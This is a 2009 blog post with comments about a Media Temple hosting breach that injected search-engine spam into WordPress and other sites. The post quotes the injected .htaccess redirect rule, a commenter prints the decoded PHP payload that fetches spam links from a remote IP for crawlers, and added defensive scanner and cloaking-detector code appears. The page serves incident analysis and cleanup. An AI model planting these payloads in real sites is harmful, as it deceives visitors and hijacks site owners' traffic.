MediaTemple/Wordpress Hack
I spent last night trying to figure out how my websites got hacked. Luckily no permanent damage was done, but it did take some time to figure out what was going on. I wanted to post my experience in case someone else comes across this same problem. Here is what happened…
By pure coincidence I happened to be looking at my robots.txt file last night. Actually, I didn’t even have a robots.txt file on my site. I was playing with Google’s Webmaster Tools and noticed that Google was giving errors when it read my robots.txt (which didn’t exist). I went to the address where there shouldn’t have been a file at all (http://fontburner.com/robots.txt) and saw a page of text filled with links to porn/spam sites. This sent me off on a wild goose chase to figure out how my site had been exploited.
The first place I looked was at my .htaccess file. My guess was that they were using the .htaccess file to redirect robots.txt to some other file. In my .htaccess file I noticed this code, which I was pretty sure wasn't put there by me:
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*images.search.yahoo.*$ [NC]
RewriteRule .* http://allvideo.org.uk/in.cgi?4&parameter=sf [R,L]
The thing that threw me off was that this looks like legitimate code, because the first line looks like it might be telling Google not to index the images of your site. Is this the work of a clever hacker adding decoy code before the really nasty stuff? In fact the whole block is the payload: each RewriteCond tests the Referer header, and the RewriteRule sends every visitor who arrives from one of those search engines to the attacker's in.cgi script, while anyone who types the address directly (including the site owner) sees the normal page.
Deleting this code from my .htaccess file didn’t seem to affect my robots.txt file so I kept looking for a solution.
At this point I opened a ticket with MediaTemple, my web host, to see if they had any advice. They responded quickly with a link to a knowledge base article called "Working with a php injected website." This article confirmed my .htaccess suspicions and also pointed me to a line of code found in php files. Removing the .htaccess code was easy, but how do you find a line of code in the thousands of php files on a Wordpress powered site?
MediaTemple also hinted at the possibility of needing to reinstall all Wordpress files, something that I really didn't want to do. I did some searching and came across a good writeup of the situation on kyle-brady.com called "Wordpress, MediaTemple, and an Injection Attack." If you are a victim of this attack, I encourage you to read this post because it gives instructions about how to identify and fix the problem, as well as many comments from other victims.
It turned out that in addition to removing the malicious code from the .htaccess file I also had to remove code from the index.php files in the root of my site. Once that was all cleared out, my robots.txt file issue was corrected. It looks like other people encountered deeper problems that affected the links in blog posts. Those people had to recreate their recent blog posts manually. Yuck.
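A scanner for the two injection patterns described above, the referer-keyed RewriteCond/RewriteRule block in .htaccess and the PHP payload prepended to index.php, as an added example (this is not the post author's or Media Temple's tooling). It walks a web root and reports each hit with its line number so the code can be reviewed and removed by hand. Assumptions: the "encoded" form of the PHP that the comments mention wraps itself in eval(base64_decode(...)) or a similar decoder (the page does not say which); the sample web root built by make_sample_webroot() is constructed for the demonstration.

```python
"""Added example: list files under a web root that carry the injected .htaccess
or PHP code.  Not code from the original post; sample files are constructed."""
import os
import re
import tempfile

# Each label maps to a regex tried against the whole file; hits are reported
# with a line number and must still be reviewed by hand before deletion.
PATTERNS = {
    # .htaccess: a RewriteCond on the referer that names a search engine
    "htaccess-referer-redirect": re.compile(
        r"RewriteCond\s+%\{HTTP_REFERER\}[^\n]*(google|yahoo|msn|bing|live|aol)", re.I),
    # PHP: eval() of a decoded string (assumed encoder wrappers, not from the page)
    "encoded-php": re.compile(
        r"eval\s*\(\s*(base64_decode|gzinflate|str_rot13)\s*\(", re.I),
    # PHP: the decoded payload tests the crawler User-Agent on a single line.
    # Keying on the UA test rather than on fsockopen() avoids flagging
    # WordPress's own HTTP client code, which legitimately calls fsockopen().
    "crawler-cloak": re.compile(
        r"HTTP_USER_AGENT[^\n]{0,120}\b(google|yahoo|msn|live)\b", re.I),
}
SCAN_EXT = {".php", ".html", ".htm"}


def scan_webroot(root):
    """Return sorted (relative path, pattern label, line number) for every hit."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            ext = os.path.splitext(name)[1].lower()
            if name != ".htaccess" and ext not in SCAN_EXT:
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    text = fh.read()
            except OSError:
                continue
            for label, rx in PATTERNS.items():
                m = rx.search(text)
                if m:
                    line_no = text.count("\n", 0, m.start()) + 1
                    hits.append((os.path.relpath(path, root), label, line_no))
    return sorted(hits)


def make_sample_webroot():
    """Build a throwaway web root with one clean and three injected files (constructed)."""
    root = tempfile.mkdtemp(prefix="webroot-")
    files = {
        ".htaccess": (
            "RewriteEngine On\n"
            "RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR]\n"
            "RewriteCond %{HTTP_REFERER} .*bing.*$ [NC]\n"
            "RewriteRule .* http://allvideo.org.uk/in.cgi?4&parameter=sf [R,L]\n"),
        # encoded payload prepended on line 1 of WordPress's real index.php
        "index.php": '<?php eval(base64_decode("Li4u")); ?><?php\n'
                     'require("./wp-blog-header.php");\n',
        # decoded form of the same payload dropped into a theme file
        "wp-content/themes/demo/footer.php":
            "<?php if(stripos($_SERVER['HTTP_USER_AGENT'], 'google')) { echo $spam; } ?>\n",
        "wp-content/themes/demo/header.php": "<?php wp_head(); ?>\n",
    }
    for rel, body in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for rel, label, line_no in scan_webroot(make_sample_webroot()):
        print("%-40s %-26s line %d" % (rel, label, line_no))
```

Run it against the real document root (for example scan_webroot("/home/12345/domains/example.com/html"), path assumed) rather than the sample. A pattern scan only finds what you already know to look for, so treat a clean result as a reason to compare the install against a fresh download of the same WordPress version, not as proof the site is clean.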
This whole ordeal has left me feeling violated and unconfident about both Wordpress and MediaTemple. If someone can add code to your .htaccess and your index.php files, that is a major hack. I feel lucky that they didn’t do more harm than they did because it seems like if you can hack those files you could easily take a site down or worse.
I am unsure who is actually to blame for this exploit, if anyone is. I have read that MediaTemple blames Wordpress and Wordpress blames MediaTemple. There are reports that Drupal sites have also been exploited, so the problem isn't limited to Wordpress only. Wordpress has released an update in the last week, but I don't see any evidence that this issue was addressed in the latest security fix.
MediaTemple has told me that they changed all affected sites passwords for FTP. They also said that they scanned their servers and removed the malicious code. This is a confusing statement because neither of these things appears to have been done in my case. My FTP password still worked, and unless I removed the code before they did, they didn’t remove it from my site.
The good news is that the issue is (hopefully) behind me. If you are hosted on MediaTemple, I would advise you to take a look at your robots.txt (even if you don’t have one) because if I hadn’t noticed it I never would have known my site was infected. You may be a victim of the hack and not even know it.
November 14th, 2009 at 11:59 pm
Thanks for this!
I ended up posting something as well. (Shameless plug: http://blog.theoriginalmrbob.com/index.php/2009/11/15/phphtaccess-hacks/ )
Thanks for your help! I thought it was just me!
November 15th, 2009 at 4:39 am
Wow, this is a pretty recent blogpost. My sites at Mediatemple were hacked in the same way on Nov 14th. On which cluster are you?
November 15th, 2009 at 11:31 am
At least one of my Media Temple sites was hacked as well (gs), though none of the sites on my (dv) appear to have been affected. Are you (gs) or (dv)?
Thanks,
Jeffrey
November 15th, 2009 at 11:41 am
Bart, I am on Cluster 1 (I think).
Jeffrey, I am on the gridserver.
November 15th, 2009 at 12:19 pm
Boy am I glad to have found this info on here! Thanks for posting it.
I have had the same exact problem with one of my gridserver web accounts. They injected this same code on all three web sites (hosted under the same directory) even though only one of them was running WordPress. This account is on Grid Cluster:02 – Storage Segment:05 (you can check this in the SERVER GUIDE section of your Media Temple account).
On a different Media Temple account where I have my personal web site I have not had any problems, although I don’t run WordPress on that site.
Did you guys use the 1-Click Applications option from MediaTemple to install WordPress? It seems that version (v2.5) is outdated and might be the culprit. If not, what version of WordPress are you guys using?
November 15th, 2009 at 1:26 pm
Laz, I did not use the 1-Click Applications option. I installed it manually. I was on version 2.85 when my site was exploited.
November 16th, 2009 at 1:28 am
My Joomla sites were all hacked in the same way.
Considering that I have now heard that Drupal and Wordpress sites were also hacked, the vulnerability must have been with Media Temple.
The support at Media Temple told me it must have been a security vulnerability with Joomla (even though I'm running the latest version 1.5.14). After reading that they told you the same about Wordpress, I'm kind of pissed off that they are not being up front about this.
November 16th, 2009 at 6:19 am
I’ve had this exact problem. Looks like the hack occurred on November 5, 2009. All of my sites hosted with Media Temple GS (grid cluster 2, storage segment 6) were hacked at the same time in the way you describe – .htaccess, index.php and even (for a hand-coded, static site) index.html were hacked to include code to siphon search traffic away to someone else’s site.
All my sites were hit, whether they were running a CMS or not (WP 2.8.5 and one older version), Dokuwiki and hardcoded HTML all got the same treatment.
I initially assumed this was a Wordpress problem. Then that my FTP account had been hacked. Now that I see others getting hit by exactly the same thing, I'm suspicious that this may actually be a Media Temple problem.
November 16th, 2009 at 10:12 am
I had the exact same injection attack happen to me at Media Temple. MT tech support said they had scanned all my files and removed the malicious code, but nothing of the sort was done – spot checks on several domains and subdomains revealed that nothing had been repaired.
Kyle Brady’s post is definitely required reading for anyone who has been a victim of this attack.
At this point, from what I can tell, the common thread through all this is Media Temple. The vast majority of affected domains and subdomains on my MT account were not WP installations, although it’s certainly possible that the attack is being made *through* WP. If this were purely a WP problem, one would expect other web hosts to be victimized as well; so far it’s only Media Temple that’s had the problem.
November 17th, 2009 at 6:54 pm
This same thing happened to me. In my case, however, there was a robots.txt file where there was no longer one, although it was empty. I checked my Urchin logs and noticed a new file in a new directory that had received quite a bit of traffic. According to my logs, the attack happened some time on Monday last week (Nov 9, 2009). Media Temple already removed that file but the directory remained.
November 17th, 2009 at 8:32 pm
Yeah, I was hacked as well. I was running the most up to date version of wordpress. I just sent in a support ticket because something seemed fishy. After searching for the link that got 10k hits in the few days it was up I found this site (google cache) http://74.125.95.132/search?q=cache:KSx1UVh52-kJ:www.dp-lab.org/movable/index.php%3Fitemid%3D892+uprzos&cd=44&hl=en&ct=clnk&gl=us&client=firefox-a that surprisingly is almost all media temple sites! There are easily a few hundred, if not thousands of sites there!
I somehow doubt almost a thousand people had their accounts compromised at once WITHOUT it being Media temple’s fault. I am much more tolerant to a hack than a coverup. I hope we learn more soon!
November 18th, 2009 at 11:16 am
Hi, my (gs) account got hacked as well, and I can confirm that the hack is not confined to wp sites. I had a couple of wp sites and hand-built sites without any kind of cms/blogging backend on my (gs) account, and both types have been hacked by manipulating .htaccess and index.php. MediaTemple says that the ftp accounts got compromised, which I find a threadbare argument, as my ftp pw, at least, was 16+ chars long and QUITE hard to brute-force. I hope that whatever back door the crackers used is closed by now.
November 23rd, 2009 at 11:52 am
I got hacked too. MULTIPLE web sites on MULTIPLE MT accounts, but NONE of them had wordpress installed.
The encoded PHP evaluates to this:
// Only act when the visitor looks like a search-engine crawler; everyone else gets the normal page.
if(stripos($_SERVER['HTTP_USER_AGENT'], 'google') or stripos($_SERVER['HTTP_USER_AGENT'], 'yahoo') or stripos($_SERVER['HTTP_USER_AGENT'], 'msn') or stripos($_SERVER['HTTP_USER_AGENT'], 'live'))
{
    $r = '';
    // Fetch the spam links for this domain from the attacker's server (errors suppressed with @).
    if($f=@fsockopen('91.207.4.18',80,$e,$er,10) and @fputs($f, "GET /linkit/in.php?domain=" . urlencode($_SERVER["SERVER_NAME"]) . "&useragent=" . urlencode($_SERVER['HTTP_USER_AGENT']) . " HTTP/1.0\r\nHost: 91.207.4.18\r\n\r\n"))
        while( $l = fread($f, 1024)) $r .= $l;
    @fclose($f);
    // Strip the HTTP response headers and echo the body straight into the page.
    $p=strpos($r,"\r\n\r\n"); echo substr($r,$p+4);
}
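The payload above is invisible to the site owner by design: a browser never sees the spam links, and the .htaccess rule only fires for visitors arriving from a search engine. The check a practitioner wants is therefore to request the same page as a browser, as a crawler, and with a search-engine referer, and compare. The following is an added example, not code from the post or its commenters: detect_cloaking() does that comparison against any URL, and InjectedSiteHandler is a constructed local stand-in that reproduces both injected behaviours so the example runs offline. The crawler User-Agent strings, the loopback server and the spam.invalid link are assumptions; the redirect target is the one from the .htaccess earlier on this page.

```python
"""Added example: probe a URL for crawler-only content and referer redirects.
Not code from the original page; the local server is a constructed fixture."""
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlsplit

NORMAL_UA = "Mozilla/5.0 (Windows NT 6.1; rv:3.5) Gecko Firefox/3.5"
CRAWLER_UAS = {                      # assumed crawler UA strings
    "googlebot": "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
    "msnbot": "msnbot/2.0b (+http://search.msn.com/msnbot.htm)",
}
SEARCH_REFERER = "http://images.google.com/imgres?q=fonts"
SPAM_REDIRECT = "http://allvideo.org.uk/in.cgi?4&parameter=sf"   # from the .htaccess above


class NoRedirect(urllib.request.HTTPRedirectHandler):
    """Make urllib surface 3xx responses as HTTPError instead of following them."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def fetch(url, user_agent, referer=None):
    """GET url once; return (status, Location header or None, body bytes)."""
    req = urllib.request.Request(url, headers={"User-Agent": user_agent})
    if referer:
        req.add_header("Referer", referer)
    opener = urllib.request.build_opener(NoRedirect())
    try:
        with opener.open(req, timeout=5) as resp:
            return resp.status, None, resp.read()
    except urllib.error.HTTPError as err:     # 3xx lands here because of NoRedirect
        return err.code, err.headers.get("Location"), err.read()


def detect_cloaking(url):
    """Compare what a browser, each crawler and a search referer get from url."""
    findings = {"cloaked_for": [], "redirects_to": None}
    base_status, _, base_body = fetch(url, NORMAL_UA)
    for name, ua in CRAWLER_UAS.items():
        status, _, body = fetch(url, ua)
        if (status, body) != (base_status, base_body):
            findings["cloaked_for"].append(name)
    status, location, _ = fetch(url, NORMAL_UA, referer=SEARCH_REFERER)
    if 300 <= status < 400 and location and \
            urlsplit(location).hostname != urlsplit(url).hostname:
        findings["redirects_to"] = location
    return findings


class InjectedSiteHandler(BaseHTTPRequestHandler):
    """Constructed stand-in reproducing the .htaccess redirect and the PHP cloak."""
    infected = True

    def do_GET(self):
        ua = self.headers.get("User-Agent", "").lower()
        referer = self.headers.get("Referer", "").lower()
        if self.infected and any(k in referer for k in
                ("images.google", "live", "aol", "bing", "msn", "images.search.yahoo")):
            self.send_response(302)                  # the RewriteRule ... [R,L]
            self.send_header("Location", SPAM_REDIRECT)
            self.end_headers()
            return
        body = b"<html><body><h1>Font Burner</h1></body></html>"
        if self.infected and any(k in ua for k in ("google", "yahoo", "msn", "live")):
            body += b'<a href="http://spam.invalid/">cheap pills</a>'   # the index.php payload
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):                  # keep the demo output quiet
        pass


class CleanSiteHandler(InjectedSiteHandler):
    infected = False


def start_site(handler):
    """Serve handler on a random loopback port in a daemon thread; return (server, url)."""
    server = HTTPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, "http://127.0.0.1:%d/" % server.server_address[1]


if __name__ == "__main__":
    for handler in (InjectedSiteHandler, CleanSiteHandler):
        server, url = start_site(handler)
        print(handler.__name__, detect_cloaking(url))
        server.shutdown()
```

Against a live site, call detect_cloaking("http://example.com/") directly and also try the robots.txt path, since that is where the post's author first noticed the spam. A site that legitimately varies content by User-Agent (mobile themes, for instance) will show up under cloaked_for too, so inspect the differing bodies before concluding anything.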
November 23rd, 2009 at 1:36 pm
I have a mediatemple account with several websites (several wordpress installations (not up to date) and a hand-coded site); all were infected in the last week or so.
November 25th, 2009 at 12:22 pm
It’s definitely not limited to Wordpress or other CMS sites. One of my clients’ Media Temple sites was attacked. It’s a hand-built site, and the only PHP included are includes and some PHP to parse a static XML file. There aren’t even any forms. If MT is trying to blame Wordpress for this, they’re really off base.
November 26th, 2009 at 10:22 am
This was not the fault of any software running on someone's account. From what I understand, mt stored everyone's passwords in plain text (ie. human readable) in their database, and it was this database itself that got hacked. This allowed hackers direct access via ftp and ssh to all of their clients' accounts.
http://michaeltorbert.com/blog/media-temple-hacked/
If you do a search on Twitter right now for mediatemple you can see all the people affected. As of right now, as far as I know, they have not issued any official statement on this, let alone an apology.
November 26th, 2009 at 3:13 pm
Hey folks, if you didn’t notice any changes to your sites, that means none of your files were affected. FTP passes were changed as a precautionary measure.
Lots of info can be found here:
http://weblog.mediatemple.net/weblog/category/system-incidents/1026-gs-security-advisory/
…with updates on the way.
Matt (mt)
December 1st, 2009 at 2:01 am
One of my clients' MT accounts got hacked as well. I hope they fixed their holes because I have a bunch of clients hosted with them.
December 9th, 2009 at 10:50 am
Hi. My Media Temple Wordpress site was hacked as well.
Here is what I want to know, as this has never happened to me before and I am semi-computer illiterate:
Is my site dead and gone? If not, how do I regain access to it?
I am also locked out of my FTP account. I assume this is related.
Any help would be greatly appreciated.